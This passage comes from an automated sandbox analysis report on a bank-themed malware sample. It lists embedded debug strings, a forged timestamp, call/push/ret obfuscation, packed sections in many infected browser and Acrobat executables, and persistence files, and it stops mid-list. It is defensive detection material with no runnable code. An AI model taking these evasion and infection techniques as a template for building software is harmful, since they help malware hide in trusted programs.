Source:	Binary string: msiexec.pdbGCTL source: elevation_service.exe, 0000000C.00000003.2427700205.0000000000830000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: mavinject32.pdbGCTL source: alg.exe, 00000002.00000003.1823198394.0000000001530000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 00000002.00000003.1817693971.00000000015A0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: PresentationFontCache.pdb source: elevation_service.exe, 0000000C.00000003.2399836267.0000000000830000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\System.ServiceModel.pdbL source: build.exe, 0000000A.00000002.2517285171.0000000001462000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: PerceptionSimulationService.pdb source: elevation_service.exe, 0000000C.00000003.2444651718.0000000000830000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: _.pdb source: RegSvcs.exe, 00000013.00000002.1452607862.0000000003085000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: crashreporter.pdb source: alg.exe, 00000002.00000003.2007802565.0000000001450000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: niellist.exe, 00000003.00000003.1285740418.0000000004AF0000.00000004.00001000.00020000.00000000.sdmp, niellist.exe, 00000003.00000003.1287306724.0000000004C90000.00000004.00001000.00020000.00000000.sdmp, niellist.exe, 00000011.00000003.1398255172.0000000004DA0000.00000004.00001000.00020000.00000000.sdmp, niellist.exe, 00000011.00000003.1398796370.0000000004F40000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: D:\T\BuildResults\bin\Release_x64\WebInstaller\AcroMiniServicesUpdater.pdb source: alg.exe, 00000002.00000003.1440737342.0000000001550000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: D:\T\BuildResults\bin\Release_x64\plug_ins\pi_brokers\MSRMSPIBroker.pdbAAAGCTL source: alg.exe, 00000002.00000003.1686861132.0000000001540000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: MsSense.pdbGCTL source: elevation_service.exe, 0000000C.00000003.2490180834.0000000000830000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: D:\dbs\el\omr\Target\x64\ship\click2run\x-none\InspectorOfficeGadget.pdb source: alg.exe, 00000002.00000003.1795445513.0000000001500000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: MsSense.pdb source: elevation_service.exe, 0000000C.00000003.2490180834.0000000000830000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: D:\T\Acrobat\Installers\ShowAppPickerForPDF\Release_x64\ShowAppPickerForPDF.pdb source: alg.exe, 00000002.00000003.1707389126.0000000001430000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 00000002.00000003.1699306292.0000000001540000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: D:\T\BuildResults\bin\Release_x64\WCChromeNativeMessagingHost.pdb888 source: alg.exe, 00000002.00000003.1588294725.0000000001540000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: Acrobat_SL.pdb((( source: alg.exe, 00000002.00000003.1399996879.0000000001550000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: locator.pdb source: elevation_service.exe, 0000000C.00000003.2475542795.00000000007A0000.00000004.00001000.00020000.00000000.sdmp, elevation_service.exe, 0000000C.00000003.2466935099.0000000000830000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\System.ServiceModel.pdb source: build.exe, 0000000A.00000002.2517285171.0000000001462000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: DiagnosticsHub.StandardCollector.Service.pdbGCTL source: elevation_service.exe, 0000000C.00000003.2370075769.0000000000830000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: ADelRCP_Exec.pdbCC9 source: alg.exe, 00000002.00000003.1552275013.0000000001550000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: D:\T\BuildResults\bin\Release_x64\AcroBroker.pdb source: alg.exe, 00000002.00000003.1414567794.0000000001550000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: Acrobat_SL.pdb source: alg.exe, 00000002.00000003.1399996879.0000000001550000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: E:\PkgInstaller\base\ntsetup\SrvPack.Main\tools\sfxcab\sfxcab\objfre\i386\sfxcab.pdbU source: alg.exe, 00000002.00000003.1762060160.0000000001430000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 00000002.00000003.1752773778.0000000001540000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 00000002.00000003.1751658354.0000000001530000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: vws\dll\mscorlib.pdb source: RegSvcs.exe, 00000013.00000002.1440773629.00000000012BB000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: D:\T\BuildResults\bin\Release_x64\WebInstaller\AcroMiniServicesUpdater.pdbT source: alg.exe, 00000002.00000003.1440737342.0000000001550000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: C:\workspace\CR-Windows-x64-Client-Builder\x64\Release\CRWindowsClientService.pdbGG source: alg.exe, 00000002.00000003.1606714904.0000000001540000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.pdb source: build.exe, 0000000A.00000002.2517285171.0000000001462000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: D:\T\BuildResults\bin\Release_x64\AcrobatInfo.pdb))) source: alg.exe, 00000002.00000003.1391363557.0000000001550000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: mavinject32.pdb source: alg.exe, 00000002.00000003.1823198394.0000000001530000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 00000002.00000003.1817693971.00000000015A0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\symbols\dll\System.ServiceModel.pdb source: build.exe, 0000000A.00000002.2517285171.0000000001462000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: 64BitMAPIBroker.pdb source: alg.exe, 00000002.00000003.1671146289.0000000001540000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: maintenanceservice.pdb source: alg.exe, 00000002.00000003.1311966425.0000000001570000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: msdtcexe.pdbGCTL source: elevation_service.exe, 0000000C.00000003.2409444636.0000000000830000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: PerceptionSimulationService.pdbGCTL source: elevation_service.exe, 0000000C.00000003.2444651718.0000000000830000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: firefox.pdb source: alg.exe, 00000002.00000003.2038612293.0000000001450000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: D:\dbs\el\omr\Target\x64\ship\click2run\x-none\InspectorOfficeGadget.pdbY source: alg.exe, 00000002.00000003.1795445513.0000000001500000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: PerfHost.pdbGCTL source: elevation_service.exe, 0000000C.00000003.2464490608.00000000007A0000.00000004.00001000.00020000.00000000.sdmp, elevation_service.exe, 0000000C.00000003.2454283724.0000000000830000.00000004.00001000.00020000.00000000.sdmp, elevation_service.exe, 0000000C.00000003.2452694800.0000000000830000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: E:\jenkins\workspace\NGL_WORKFLOW\build\master\win64\Release\Acrobat\project\win\ngl-workflow\x64\Release (Acrobat)\adobe_licensing_wf_helper_acro.pdb source: alg.exe, 00000002.00000003.1649365761.0000000001540000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: D:\T\BuildResults\bin\Release_x64\WCChromeNativeMessagingHost.pdb source: alg.exe, 00000002.00000003.1588294725.0000000001540000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: firefox.pdbP source: alg.exe, 00000002.00000003.2038612293.0000000001450000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\symbols\dll\System.ServiceModel.pdbL" source: build.exe, 0000000A.00000002.2517285171.0000000001462000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\workspace\CR-Windows-x64-Client-Builder\x64\Release\CRWindowsClientService.pdb source: alg.exe, 00000002.00000003.1606714904.0000000001540000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: C:\work\p4\splinters\Splinters\S\BuildResults\bin\Win32\ReaderRelease\FullTrustNotifier\FullTrustNotifier.pdb source: alg.exe, 00000002.00000003.1692304917.0000000001540000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: D:\T\BuildResults\bin\Release\Plug_ins\pi_brokers\32BitMAPIBroker.pdb@@ source: alg.exe, 00000002.00000003.1656511183.0000000001540000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: PerfHost.pdb source: elevation_service.exe, 0000000C.00000003.2464490608.00000000007A0000.00000004.00001000.00020000.00000000.sdmp, elevation_service.exe, 0000000C.00000003.2454283724.0000000000830000.00000004.00001000.00020000.00000000.sdmp, elevation_service.exe, 0000000C.00000003.2452694800.0000000000830000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: D:\T\BuildResults\bin\Release_x64\plug_ins\pi_brokers\MSRMSPIBroker.pdb source: alg.exe, 00000002.00000003.1686861132.0000000001540000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: maintenanceservice.pdb` source: alg.exe, 00000002.00000003.1311966425.0000000001570000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: D:\T\Acrobat\Installers\ShowAppPickerForPDF\Release_x64\ShowAppPickerForPDF.pdb$$ source: alg.exe, 00000002.00000003.1707389126.0000000001430000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 00000002.00000003.1699306292.0000000001540000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdbUGP source: niellist.exe, 00000003.00000003.1285740418.0000000004AF0000.00000004.00001000.00020000.00000000.sdmp, niellist.exe, 00000003.00000003.1287306724.0000000004C90000.00000004.00001000.00020000.00000000.sdmp, niellist.exe, 00000011.00000003.1398255172.0000000004DA0000.00000004.00001000.00020000.00000000.sdmp, niellist.exe, 00000011.00000003.1398796370.0000000004F40000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: D:\T\BuildResults\bin\Release_x64\Eula.pdb source: alg.exe, 00000002.00000003.1614007446.0000000001540000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: System.ServiceModel.pdb source: build.exe, 0000000A.00000002.2517285171.00000000014FB000.00000004.00000020.00020000.00000000.sdmp, build.exe, 0000000A.00000002.2603046672.0000000006620000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: ALG.pdb source: Ziraat_Bankasi_Swift-Messaji_Notifications.exe, 00000000.00000003.1257737634.0000000003F40000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: msdtcexe.pdb source: elevation_service.exe, 0000000C.00000003.2409444636.0000000000830000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\dll\System.ServiceModel.pdb source: build.exe, 0000000A.00000002.2517285171.0000000001462000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: DiagnosticsHub.StandardCollector.Service.pdb source: elevation_service.exe, 0000000C.00000003.2370075769.0000000000830000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: ALG.pdbGCTL source: Ziraat_Bankasi_Swift-Messaji_Notifications.exe, 00000000.00000003.1257737634.0000000003F40000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: PresentationFontCache.pdbHt^t Pt_CorExeMainmscoree.dll source: elevation_service.exe, 0000000C.00000003.2399836267.0000000000830000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: D:\T\BuildResults\bin\Release_x64\AcroBroker.pdbTTT source: alg.exe, 00000002.00000003.1414567794.0000000001550000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: locator.pdbGCTL source: elevation_service.exe, 0000000C.00000003.2475542795.00000000007A0000.00000004.00001000.00020000.00000000.sdmp, elevation_service.exe, 0000000C.00000003.2466935099.0000000000830000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: AppVShNotify.pdb source: alg.exe, 00000002.00000003.1790463351.0000000001530000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: D:\T\BuildResults\bin\Release\Plug_ins\pi_brokers\32BitMAPIBroker.pdb source: alg.exe, 00000002.00000003.1656511183.0000000001540000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: D:\T\BuildResults\bin\Release_x64\Eula.pdb888 source: alg.exe, 00000002.00000003.1614007446.0000000001540000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: AppVShNotify.pdbGCTL source: alg.exe, 00000002.00000003.1790463351.0000000001530000.00000004.00001000.00020000.00000000.sdmp

Binary contains a suspicious time stamp

Source: alg.exe.0.dr

Static PE information: 0xF67E8745 [Tue Jan 18 10:28:21 2101 UTC]

Contains functionality to dynamically determine API calls

Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe

Code function: 0_2_00404B37 LoadLibraryA,GetProcAddress,

0_2_00404B37

PE file contains an invalid checksum

Source: AppVClient.exe.0.dr

Static PE information: real checksum: 0xcd10f should be: 0x153130

PE file contains sections with non-standard names

Source: armsvc.exe.0.dr	Static PE information: section name: .didat
Source: alg.exe.0.dr	Static PE information: section name: .didat
Source: officesvcmgr.exe.2.dr	Static PE information: section name: .didat
Source: chrome_pwa_launcher.exe.2.dr	Static PE information: section name: .gxfg
Source: chrome_pwa_launcher.exe.2.dr	Static PE information: section name: .retplne
Source: chrome_pwa_launcher.exe.2.dr	Static PE information: section name: LZMADEC
Source: chrome_pwa_launcher.exe.2.dr	Static PE information: section name: _RDATA
Source: elevated_tracing_service.exe.2.dr	Static PE information: section name: .gxfg
Source: elevated_tracing_service.exe.2.dr	Static PE information: section name: .retplne
Source: elevated_tracing_service.exe.2.dr	Static PE information: section name: CPADinfo
Source: elevated_tracing_service.exe.2.dr	Static PE information: section name: _RDATA
Source: elevated_tracing_service.exe.2.dr	Static PE information: section name: malloc_h
Source: chrmstp.exe.2.dr	Static PE information: section name: .gxfg
Source: chrmstp.exe.2.dr	Static PE information: section name: .retplne
Source: chrmstp.exe.2.dr	Static PE information: section name: .rodata
Source: chrmstp.exe.2.dr	Static PE information: section name: CPADinfo
Source: chrmstp.exe.2.dr	Static PE information: section name: LZMADEC
Source: chrmstp.exe.2.dr	Static PE information: section name: _RDATA
Source: chrmstp.exe.2.dr	Static PE information: section name: malloc_h
Source: setup.exe.2.dr	Static PE information: section name: .gxfg
Source: setup.exe.2.dr	Static PE information: section name: .retplne
Source: setup.exe.2.dr	Static PE information: section name: .rodata
Source: setup.exe.2.dr	Static PE information: section name: CPADinfo
Source: setup.exe.2.dr	Static PE information: section name: LZMADEC
Source: setup.exe.2.dr	Static PE information: section name: _RDATA
Source: setup.exe.2.dr	Static PE information: section name: malloc_h
Source: notification_helper.exe.2.dr	Static PE information: section name: .gxfg
Source: notification_helper.exe.2.dr	Static PE information: section name: .retplne
Source: notification_helper.exe.2.dr	Static PE information: section name: CPADinfo
Source: notification_helper.exe.2.dr	Static PE information: section name: _RDATA
Source: os_update_handler.exe.2.dr	Static PE information: section name: .gxfg
Source: os_update_handler.exe.2.dr	Static PE information: section name: .retplne
Source: os_update_handler.exe.2.dr	Static PE information: section name: CPADinfo
Source: os_update_handler.exe.2.dr	Static PE information: section name: LZMADEC
Source: os_update_handler.exe.2.dr	Static PE information: section name: _RDATA
Source: chrome_proxy.exe.2.dr	Static PE information: section name: .gxfg
Source: chrome_proxy.exe.2.dr	Static PE information: section name: .retplne
Source: chrome_proxy.exe.2.dr	Static PE information: section name: _RDATA
Source: crashreporter.exe.2.dr	Static PE information: section name: .00cfg
Source: crashreporter.exe.2.dr	Static PE information: section name: .voltbl
Source: default-browser-agent.exe.2.dr	Static PE information: section name: .00cfg
Source: default-browser-agent.exe.2.dr	Static PE information: section name: .voltbl
Source: firefox.exe.2.dr	Static PE information: section name: .00cfg
Source: firefox.exe.2.dr	Static PE information: section name: .freestd
Source: firefox.exe.2.dr	Static PE information: section name: .retplne
Source: firefox.exe.2.dr	Static PE information: section name: .voltbl
Source: updater.exe.2.dr	Static PE information: section name: CPADinfo
Source: updater.exe.2.dr	Static PE information: section name: malloc_h
Source: maintenanceservice.exe.2.dr	Static PE information: section name: .00cfg
Source: maintenanceservice.exe.2.dr	Static PE information: section name: .voltbl
Source: maintenanceservice.exe.2.dr	Static PE information: section name: _RDATA
Source: elevation_service.exe.2.dr	Static PE information: section name: .00cfg
Source: elevation_service.exe.2.dr	Static PE information: section name: .gxfg
Source: elevation_service.exe.2.dr	Static PE information: section name: .retplne
Source: elevation_service.exe.2.dr	Static PE information: section name: _RDATA
Source: elevation_service.exe.2.dr	Static PE information: section name: malloc_h
Source: maintenanceservice.exe0.2.dr	Static PE information: section name: .00cfg
Source: maintenanceservice.exe0.2.dr	Static PE information: section name: .voltbl
Source: maintenanceservice.exe0.2.dr	Static PE information: section name: _RDATA
Source: elevation_service.exe0.2.dr	Static PE information: section name: .gxfg
Source: elevation_service.exe0.2.dr	Static PE information: section name: .retplne
Source: elevation_service.exe0.2.dr	Static PE information: section name: _RDATA
Source: Acrobat.exe.2.dr	Static PE information: section name: .didat
Source: Acrobat.exe.2.dr	Static PE information: section name: _RDATA
Source: unpack200.exe.2.dr	Static PE information: section name: .00cfg
Source: ie_to_edge_stub.exe.2.dr	Static PE information: section name: .00cfg
Source: ie_to_edge_stub.exe.2.dr	Static PE information: section name: .gxfg
Source: ie_to_edge_stub.exe.2.dr	Static PE information: section name: .retplne
Source: ie_to_edge_stub.exe.2.dr	Static PE information: section name: _RDATA
Source: cookie_exporter.exe.2.dr	Static PE information: section name: .00cfg
Source: cookie_exporter.exe.2.dr	Static PE information: section name: .gxfg
Source: cookie_exporter.exe.2.dr	Static PE information: section name: .retplne
Source: cookie_exporter.exe.2.dr	Static PE information: section name: _RDATA
Source: identity_helper.exe.2.dr	Static PE information: section name: .00cfg
Source: identity_helper.exe.2.dr	Static PE information: section name: .gxfg
Source: identity_helper.exe.2.dr	Static PE information: section name: .retplne
Source: identity_helper.exe.2.dr	Static PE information: section name: _RDATA
Source: identity_helper.exe.2.dr	Static PE information: section name: malloc_h
Source: setup.exe0.2.dr	Static PE information: section name: .00cfg
Source: setup.exe0.2.dr	Static PE information: section name: .gxfg
Source: setup.exe0.2.dr	Static PE information: section name: .retplne
Source: setup.exe0.2.dr	Static PE information: section name: LZMADEC
Source: setup.exe0.2.dr	Static PE information: section name: _RDATA
Source: setup.exe0.2.dr	Static PE information: section name: malloc_h
Source: msedgewebview2.exe.2.dr	Static PE information: section name: .00cfg
Source: msedgewebview2.exe.2.dr	Static PE information: section name: .gxfg
Source: msedgewebview2.exe.2.dr	Static PE information: section name: .retplne
Source: msedgewebview2.exe.2.dr	Static PE information: section name: CPADinfo
Source: msedgewebview2.exe.2.dr	Static PE information: section name: LZMADEC
Source: msedgewebview2.exe.2.dr	Static PE information: section name: _RDATA
Source: msedgewebview2.exe.2.dr	Static PE information: section name: malloc_h
Source: msedge_proxy.exe.2.dr	Static PE information: section name: .00cfg
Source: msedge_proxy.exe.2.dr	Static PE information: section name: .gxfg
Source: msedge_proxy.exe.2.dr	Static PE information: section name: .retplne
Source: msedge_proxy.exe.2.dr	Static PE information: section name: _RDATA
Source: msedge_proxy.exe.2.dr	Static PE information: section name: malloc_h
Source: msedge_pwa_launcher.exe.2.dr	Static PE information: section name: .00cfg
Source: msedge_pwa_launcher.exe.2.dr	Static PE information: section name: .gxfg
Source: msedge_pwa_launcher.exe.2.dr	Static PE information: section name: .retplne
Source: msedge_pwa_launcher.exe.2.dr	Static PE information: section name: LZMADEC
Source: msedge_pwa_launcher.exe.2.dr	Static PE information: section name: _RDATA
Source: msedge_pwa_launcher.exe.2.dr	Static PE information: section name: malloc_h
Source: notification_click_helper.exe.2.dr	Static PE information: section name: .00cfg
Source: notification_click_helper.exe.2.dr	Static PE information: section name: .gxfg
Source: notification_click_helper.exe.2.dr	Static PE information: section name: .retplne
Source: notification_click_helper.exe.2.dr	Static PE information: section name: CPADinfo
Source: notification_click_helper.exe.2.dr	Static PE information: section name: _RDATA
Source: notification_click_helper.exe.2.dr	Static PE information: section name: malloc_h
Source: pwahelper.exe.2.dr	Static PE information: section name: .00cfg
Source: pwahelper.exe.2.dr	Static PE information: section name: .gxfg
Source: pwahelper.exe.2.dr	Static PE information: section name: .retplne
Source: pwahelper.exe.2.dr	Static PE information: section name: _RDATA
Source: pwahelper.exe.2.dr	Static PE information: section name: malloc_h
Source: AcroCEF.exe.2.dr	Static PE information: section name: .didat
Source: AcroCEF.exe.2.dr	Static PE information: section name: _RDATA
Source: SingleClientServicesUpdater.exe.2.dr	Static PE information: section name: .didat
Source: SingleClientServicesUpdater.exe.2.dr	Static PE information: section name: _RDATA
Source: AcroCEF.exe0.2.dr	Static PE information: section name: .didat
Source: AcroCEF.exe0.2.dr	Static PE information: section name: _RDATA
Source: SingleClientServicesUpdater.exe0.2.dr	Static PE information: section name: .didat
Source: SingleClientServicesUpdater.exe0.2.dr	Static PE information: section name: _RDATA

Uses code obfuscation techniques (call, push, ret)

Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	Code function: 0_2_00428945 push ecx; ret	0_2_00428958
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	Code function: 0_2_00402F12 push es; retf	0_2_00402F13
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	Code function: 0_2_00ADB180 push 00ADB0CAh; ret	0_2_00ADB061
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	Code function: 0_2_00ADB180 push 00ADB30Dh; ret	0_2_00ADB1E6
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	Code function: 0_2_00ADB180 push 00ADB2F2h; ret	0_2_00ADB262
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	Code function: 0_2_00ADB180 push 00ADB255h; ret	0_2_00ADB2ED
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	Code function: 0_2_00ADB180 push 00ADB2D0h; ret	0_2_00ADB346
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	Code function: 0_2_00ADB180 push 00ADB37Fh; ret	0_2_00ADB3B7
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	Code function: 0_2_00AD520C push 00AD528Fh; ret	0_2_00AD522D
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	Code function: 0_2_00AF8550 push 00AF852Eh; ret	0_2_00AF7F3A
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	Code function: 0_2_00AF8550 push 00AF8514h; ret	0_2_00AF7F66
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	Code function: 0_2_00AF8550 push 00AF7E66h; ret	0_2_00AF8057
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	Code function: 0_2_00AF8550 push 00AF817Ah; ret	0_2_00AF808B
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	Code function: 0_2_00AF8550 push 00AF82E5h; ret	0_2_00AF80D9
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	Code function: 0_2_00AF8550 push 00AF826Ah; ret	0_2_00AF819E
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	Code function: 0_2_00AF8550 push 00AF849Ch; ret	0_2_00AF81E4
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	Code function: 0_2_00AF8550 push 00AF805Ch; ret	0_2_00AF8255
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	Code function: 0_2_00AF8550 push 00AF8321h; ret	0_2_00AF82E0
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	Code function: 0_2_00AF8550 push 00AF7FBFh; ret	0_2_00AF831F
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	Code function: 0_2_00AF8550 push 00AF7FA8h; ret	0_2_00AF834C
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	Code function: 0_2_00AF8550 push 00AF84BAh; ret	0_2_00AF83E2
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	Code function: 0_2_00AF8550 push 00AF8426h; ret	0_2_00AF84D8
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	Code function: 0_2_00AF8550 push 00AF8075h; ret	0_2_00AF84FD
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	Code function: 0_2_00AF8550 push 00AF808Ch; ret	0_2_00AF8512
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	Code function: 0_2_00AF8550 push 00AF8B6Fh; ret	0_2_00AF8596
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	Code function: 0_2_00AF8550 push 00AF8E94h; ret	0_2_00AF85C9
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	Code function: 0_2_00AF8550 push 00AF878Bh; ret	0_2_00AF8734
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	Code function: 0_2_00AF8550 push 00AF8D45h; ret	0_2_00AF87D3
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	Code function: 0_2_00AF8550 push 00AF8E5Fh; ret	0_2_00AF885F
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	Code function: 0_2_00AF8550 push 00AF8AB5h; ret	0_2_00AF8B13
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	Code function: 0_2_00AF8550 push 00AF8784h; ret	0_2_00AF8CA1

Source: Ziraat_Bankasi_Swift-Messaji_Notifications.exe	Static PE information: section name: .reloc entropy: 7.931602490930911
Source: niellist.exe.0.dr	Static PE information: section name: .reloc entropy: 7.931602490930911
Source: AppVClient.exe.0.dr	Static PE information: section name: .reloc entropy: 7.936484752465955
Source: officesvcmgr.exe.2.dr	Static PE information: section name: .reloc entropy: 7.937208276445302
Source: chrome_pwa_launcher.exe.2.dr	Static PE information: section name: .reloc entropy: 7.941673740769108
Source: AutoIt3_x64.exe.2.dr	Static PE information: section name: .reloc entropy: 7.943916878766287
Source: SciTE.exe.2.dr	Static PE information: section name: .reloc entropy: 7.912294411088926
Source: jucheck.exe.2.dr	Static PE information: section name: .reloc entropy: 7.931052218150096
Source: jusched.exe.2.dr	Static PE information: section name: .reloc entropy: 7.936037837889428
Source: elevated_tracing_service.exe.2.dr	Static PE information: section name: .reloc entropy: 7.937492437508995
Source: chrmstp.exe.2.dr	Static PE information: section name: .reloc entropy: 7.9359021068054485
Source: setup.exe.2.dr	Static PE information: section name: .reloc entropy: 7.935901892594789
Source: notification_helper.exe.2.dr	Static PE information: section name: .reloc entropy: 7.9446303310280735
Source: os_update_handler.exe.2.dr	Static PE information: section name: .reloc entropy: 7.943489828015681
Source: chrome_proxy.exe.2.dr	Static PE information: section name: .reloc entropy: 7.940804420536394
Source: default-browser-agent.exe.2.dr	Static PE information: section name: .reloc entropy: 7.941517758258086
Source: firefox.exe.2.dr	Static PE information: section name: .reloc entropy: 7.93886858959448
Source: updater.exe.2.dr	Static PE information: section name: .reloc entropy: 7.878644949506129
Source: elevation_service.exe.2.dr	Static PE information: section name: .reloc entropy: 7.945941404050487
Source: elevation_service.exe0.2.dr	Static PE information: section name: .reloc entropy: 7.945122234201387
Source: 7zFM.exe.2.dr	Static PE information: section name: .reloc entropy: 7.932133822129433
Source: 7zG.exe.2.dr	Static PE information: section name: .reloc entropy: 7.9276747476160345
Source: Acrobat.exe.2.dr	Static PE information: section name: .reloc entropy: 7.940529493632316
Source: identity_helper.exe.2.dr	Static PE information: section name: .reloc entropy: 7.940722839651193
Source: setup.exe0.2.dr	Static PE information: section name: .reloc entropy: 7.944734605502099
Source: msedgewebview2.exe.2.dr	Static PE information: section name: .reloc entropy: 7.936561935775991
Source: msedge_proxy.exe.2.dr	Static PE information: section name: .reloc entropy: 7.94225456216923
Source: msedge_pwa_launcher.exe.2.dr	Static PE information: section name: .reloc entropy: 7.9462488646796805
Source: notification_click_helper.exe.2.dr	Static PE information: section name: .reloc entropy: 7.944000050287652
Source: pwahelper.exe.2.dr	Static PE information: section name: .reloc entropy: 7.940884454479864
Source: AcroCEF.exe.2.dr	Static PE information: section name: .reloc entropy: 7.937547865419181
Source: SingleClientServicesUpdater.exe.2.dr	Static PE information: section name: .reloc entropy: 7.943696985461369
Source: AcroCEF.exe0.2.dr	Static PE information: section name: .reloc entropy: 7.937547623122581
Source: SingleClientServicesUpdater.exe0.2.dr	Static PE information: section name: .reloc entropy: 7.943698423708796

Persistence and Installation Behavior

Creates files in the system32 config directory

Source: C:\Windows\System32\alg.exe

File created: C:\Windows\system32\config\systemprofile\AppData\Roaming\a8259331cca430bb.bin

Jump to behavior

Drops executable to a common third party application directory

